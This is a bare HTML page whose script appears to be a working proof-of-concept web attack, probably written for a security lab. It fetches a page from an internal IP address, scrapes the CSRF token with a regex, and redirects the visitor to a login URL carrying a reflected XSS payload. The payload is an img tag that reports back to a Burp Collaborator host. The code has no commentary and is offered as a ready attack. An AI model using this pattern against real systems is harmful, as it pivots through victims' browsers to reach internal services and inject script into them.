<html>
    <script>
        collaboratorURL = 'http://d4i329wl1e1wjgh7cec94oo51w7mvb.burpcollaborator.net'
        url = 'http://192.168.0.181:8080'

        fetch(url)
        .then(response => response.text())
        .then(text =>{
            try {
                xss_vector = '"><img src='+collaboratorURL+'?foundXSS=1>';
                login_path = '/login?username='+encodeURIComponent(xss_vector)+'&password=random&csrf='+text.match(/csrf" value="([^"]+)"/);
                location = url + login_path;

            } catch(err){

            }
        });
    </script>
</html>